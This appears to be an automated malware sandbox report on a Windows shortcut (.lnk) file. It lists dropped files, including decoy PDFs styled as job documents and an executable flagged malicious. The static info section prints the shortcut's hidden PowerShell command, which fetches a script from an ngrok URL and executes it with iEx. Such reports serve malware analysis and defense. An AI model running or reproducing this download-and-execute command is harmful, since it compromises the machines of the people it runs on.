                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):11406
                                                                                                                                                                                                                                                                  Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                  MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                  SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                  SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                  SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):854
                                                                                                                                                                                                                                                                  Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                  MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                  SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                  SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                  SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2525
                                                                                                                                                                                                                                                                  Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                  MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                  SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                  SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                  SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):97
                                                                                                                                                                                                                                                                  Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                  MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                  SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                  SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                  SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):122218
                                                                                                                                                                                                                                                                  Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                  MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                  SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                  SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                  SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir7260_505855379\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):130866
                                                                                                                                                                                                                                                                  Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                  MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                  SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                  SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                  SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                  C:\Users\user\Documents\ThaiPerfecto\sdk\PerfectoUna.exe

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\678f1ad3-4458-46d8-ad95-b8d4b2696f10.exe
                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):979567147
                                                                                                                                                                                                                                                                  Entropy (8bit):0.041789185797822925
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                                                                  MD5:5C65CCC4E6024BB5AC70F33AD4ED7DEA
                                                                                                                                                                                                                                                                  SHA1:FE43DE74E55C42EC6087E1C4D433703D5765667D
                                                                                                                                                                                                                                                                  SHA-256:23B3CA8130145F8E625DECF73DE5B7D06BDEBDED7349EB459C9029C7797265A1
                                                                                                                                                                                                                                                                  SHA-512:AAEAB13AAF2C3900F81136EE90E9EFE8E0C49D64AEAAFF526EB547B7EDD14F067A46F2086D1AF0ABF39D585C38FD9274237ECB7F5B140825066479062CCA0C30
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Qn..Qn..Qn......@n.......n......Cn......Gn.......n......Wn......Kn......Pn......Ln..Qn..qo.......n....A.Pn..Qn).Pn......Pn..RichQn..........PE..L.....f...............!.....4#...................@..........................P-......D"...@.................................."..........p. ..............)...........w..p...........................@v..@............................................text............................... ..`.rdata...`.......T..................@..@.data....`...@...>... ..............@....rsrc...p. ....... ..^..............@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\Downloads\6408fcd0-681e-437b-9109-d1da61c68cc9.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:PDF document, version 1.7
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):656088
                                                                                                                                                                                                                                                                  Entropy (8bit):7.994208869820549
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:r/TWRciaGbqp+t4v1TxPDt75QhxfR4/xFSnhfCsP10+:jTgc3Iq+0hxLt75Q6ZFShf/Pm+
                                                                                                                                                                                                                                                                  MD5:19E87DB70542A9FA556C1412E35FC300
                                                                                                                                                                                                                                                                  SHA1:B74FE6AB84969B938BF76E2A780546CFC727EAFB
                                                                                                                                                                                                                                                                  SHA-256:CF41E7881EC4A232F462EF0FC0E15C409619D18B3A8A84B49768268505AF80E3
                                                                                                                                                                                                                                                                  SHA-512:3983D20EF020BCAED0A3269CAE844B35BFCC99558820697517D4C9BDBD886D425A3236D08DB9194E816F0AACE2E6DDEFF0F95A693B4ED7FC3B91EBA018CEF440
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:%PDF-1.7.%.....18 0 obj.<<./Length 293./N 3./Filter /FlateDecode.>>.stream.x.}..J......(.....28.h..iRpi"..V..S..A.OHS..tspu+....c(....#....AR.x.......@.....?..F..[V[..G@`*...dK..$...O.K..o...@...6..`.O.,f'..O. .a.sx.0A..6..vf...8....{c7..%op..Z.:u.....Q.......0Q.F.....*....(.S....DGACAa..j.g.rx....]..s...PxM.......c...vhO.<..v....-X}...b3~...*....mDJH.T~...K..endstream.endobj.19 0 obj.<<./Type /XObject./Subtype /Image./Width 2400./Height 1363./ColorSpace /DeviceRGB./BitsPerComponent 8./ColorTransform 0./Filter [/FlateDecode /DCTDecode]./DecodeParms [null <<./Quality 45.>>]./Length 11488.>>.stream.x..}}p..y.}. ....:..4nA'`........I..e.....T].).E.!....&u..9.&k.0-.]A.......m...V.Lf.FP..!.4M..Q.......M......gw...=H....x.....o...........x&qj......F.3.}...O......}.?.......}.....~lq.-,}.g?....K......>......\_.....I..f.x.........G.....w....\:~9.|.".h2.h..7..5.Hf.._B.K.....G...:A>..D*.N......y........Sg.g....=..+..~.+.~...............N.wtl|..O..O......CO........B.r...|..

                                                                                                                                                                                                                                                                  C:\Users\user\Downloads\Documents about company information and job descriptions (4).pdf (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:PDF document, version 1.7
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):656088
                                                                                                                                                                                                                                                                  Entropy (8bit):7.994208869820549
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:r/TWRciaGbqp+t4v1TxPDt75QhxfR4/xFSnhfCsP10+:jTgc3Iq+0hxLt75Q6ZFShf/Pm+
                                                                                                                                                                                                                                                                  MD5:19E87DB70542A9FA556C1412E35FC300
                                                                                                                                                                                                                                                                  SHA1:B74FE6AB84969B938BF76E2A780546CFC727EAFB
                                                                                                                                                                                                                                                                  SHA-256:CF41E7881EC4A232F462EF0FC0E15C409619D18B3A8A84B49768268505AF80E3
                                                                                                                                                                                                                                                                  SHA-512:3983D20EF020BCAED0A3269CAE844B35BFCC99558820697517D4C9BDBD886D425A3236D08DB9194E816F0AACE2E6DDEFF0F95A693B4ED7FC3B91EBA018CEF440
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:%PDF-1.7.%.....18 0 obj.<<./Length 293./N 3./Filter /FlateDecode.>>.stream.x.}..J......(.....28.h..iRpi"..V..S..A.OHS..tspu+....c(....#....AR.x.......@.....?..F..[V[..G@`*...dK..$...O.K..o...@...6..`.O.,f'..O. .a.sx.0A..6..vf...8....{c7..%op..Z.:u.....Q.......0Q.F.....*....(.S....DGACAa..j.g.rx....]..s...PxM.......c...vhO.<..v....-X}...b3~...*....mDJH.T~...K..endstream.endobj.19 0 obj.<<./Type /XObject./Subtype /Image./Width 2400./Height 1363./ColorSpace /DeviceRGB./BitsPerComponent 8./ColorTransform 0./Filter [/FlateDecode /DCTDecode]./DecodeParms [null <<./Quality 45.>>]./Length 11488.>>.stream.x..}}p..y.}. ....:..4nA'`........I..e.....T].).E.!....&u..9.&k.0-.]A.......m...V.Lf.FP..!.4M..Q.......M......gw...=H....x.....o...........x&qj......F.3.}...O......}.?.......}.....~lq.-,}.g?....K......>......\_.....I..f.x.........G.....w....\:~9.|.".h2.h..7..5.Hf.._B.K.....G...:A>..D*.N......y........Sg.g....=..+..~.+.~...............N.wtl|..O..O......CO........B.r...|..

                                                                                                                                                                                                                                                                  C:\Users\user\Downloads\Unconfirmed 350152.crdownload (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:PDF document, version 1.7
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):656088
                                                                                                                                                                                                                                                                  Entropy (8bit):7.994208869820549
                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                  SSDEEP:12288:r/TWRciaGbqp+t4v1TxPDt75QhxfR4/xFSnhfCsP10+:jTgc3Iq+0hxLt75Q6ZFShf/Pm+
                                                                                                                                                                                                                                                                  MD5:19E87DB70542A9FA556C1412E35FC300
                                                                                                                                                                                                                                                                  SHA1:B74FE6AB84969B938BF76E2A780546CFC727EAFB
                                                                                                                                                                                                                                                                  SHA-256:CF41E7881EC4A232F462EF0FC0E15C409619D18B3A8A84B49768268505AF80E3
                                                                                                                                                                                                                                                                  SHA-512:3983D20EF020BCAED0A3269CAE844B35BFCC99558820697517D4C9BDBD886D425A3236D08DB9194E816F0AACE2E6DDEFF0F95A693B4ED7FC3B91EBA018CEF440
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:%PDF-1.7.%.....18 0 obj.<<./Length 293./N 3./Filter /FlateDecode.>>.stream.x.}..J......(.....28.h..iRpi"..V..S..A.OHS..tspu+....c(....#....AR.x.......@.....?..F..[V[..G@`*...dK..$...O.K..o...@...6..`.O.,f'..O. .a.sx.0A..6..vf...8....{c7..%op..Z.:u.....Q.......0Q.F.....*....(.S....DGACAa..j.g.rx....]..s...PxM.......c...vhO.<..v....-X}...b3~...*....mDJH.T~...K..endstream.endobj.19 0 obj.<<./Type /XObject./Subtype /Image./Width 2400./Height 1363./ColorSpace /DeviceRGB./BitsPerComponent 8./ColorTransform 0./Filter [/FlateDecode /DCTDecode]./DecodeParms [null <<./Quality 45.>>]./Length 11488.>>.stream.x..}}p..y.}. ....:..4nA'`........I..e.....T].).E.!....&u..9.&k.0-.]A.......m...V.Lf.FP..!.4M..Q.......M......gw...=H....x.....o...........x&qj......F.3.}...O......}.?.......}.....~lq.-,}.g?....K......>......\_.....I..f.x.........G.....w....\:~9.|.".h2.h..7..5.Hf.._B.K.....G...:A>..D*.N......y........Sg.g....=..+..~.+.~...............N.wtl|..O..O......CO........B.r...|..

                                                                                                                                                                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                                                                                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                                                                                                  Entropy (8bit):4.422422959368261
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:cSvfpi6ceLP/9skLmb0OTyWSPHaJG8nAgeMZMMhA2fX4WABlEnNU0uhiTw:HvloTyW+EZMM6DFym03w
                                                                                                                                                                                                                                                                  MD5:530A726CC903BC6F59E39301FF67AD4D
                                                                                                                                                                                                                                                                  SHA1:A4B34116FB7FE59024056BDBDEBB87CFEC56DCEC
                                                                                                                                                                                                                                                                  SHA-256:2215F0629702617C4BC8756BFE3EFC44F0F85AC3C866D496D8337D0A03A9444F
                                                                                                                                                                                                                                                                  SHA-512:79FE738C3E144434ECB1887421F76C838B44FCAF8568BB0F70DF3DB6B95B1BA1C18116A641FD8A71172D4F2314A864A7A19E28EC33384AF1E7B6804D51596392
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmB....R..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Thu Nov 28 22:32:21 2024, mtime=Sun Dec 1 16:36:54 2024, atime=Thu Nov 28 22:32:21 2024, length=289792, window=hide
                                                                                                                                                                                                                                                                  Entropy (8bit):3.7278537074335456
                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                  • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                                                                                                                  File name:xWpAZpLw47.lnk
                                                                                                                                                                                                                                                                  File size:2'600 bytes
                                                                                                                                                                                                                                                                  MD5:ae5d25dd208b36de2cf9b267cd269d9f
                                                                                                                                                                                                                                                                  SHA1:5be143764fb671c3818e178298269e79d204c2e2
                                                                                                                                                                                                                                                                  SHA256:097c3f660c7d255147e359239dafdbd5f24f25a1a9450863160fc049256c1908
                                                                                                                                                                                                                                                                  SHA512:ed54ee7b5149dc6e7692f775329cd633034d90c9aa08e05455d2b00f192b54fec4d75055615df489a778952ee762e09e9f8eaac96d9c9fc6b7eb156ba62f6bb9
                                                                                                                                                                                                                                                                  SSDEEP:48:8GIgax4PsU/ruW9qQ2qr83Gd0lL4XuH4Xv3SsgoQYk:8fgaxEs2ruW9qJqKdl2uWvZg5Y
                                                                                                                                                                                                                                                                  TLSH:FB51BD256AD91735F3F34E3689B7B6518A7BF956AC228F2E405042480C62B05DC76F3B
                                                                                                                                                                                                                                                                  File Content Preview:L..................F.@.. ....Q...A.......D.......A...l......................5....P.O. .:i.....+00.../C:\...................V.1......Y'...Windows.@........OwH.Y(...........................-...W.i.n.d.o.w.s.....Z.1......Y)...System32..B........OwH.YI.......

                                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                                  Icon Hash:72d282828e8d8dd5

                                                                                                                                                                                                                                                                  Static Windows Shortcut Info

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Relative Path:..\..\..\..\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Command Line Argument:/c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aab784 curl ; sal avfea3 iEx ; avfea3(aab784 -Uri https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/f08a7638d48ba191b651003837c0a34d -UseBasicParsing)
                                                                                                                                                                                                                                                                  Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

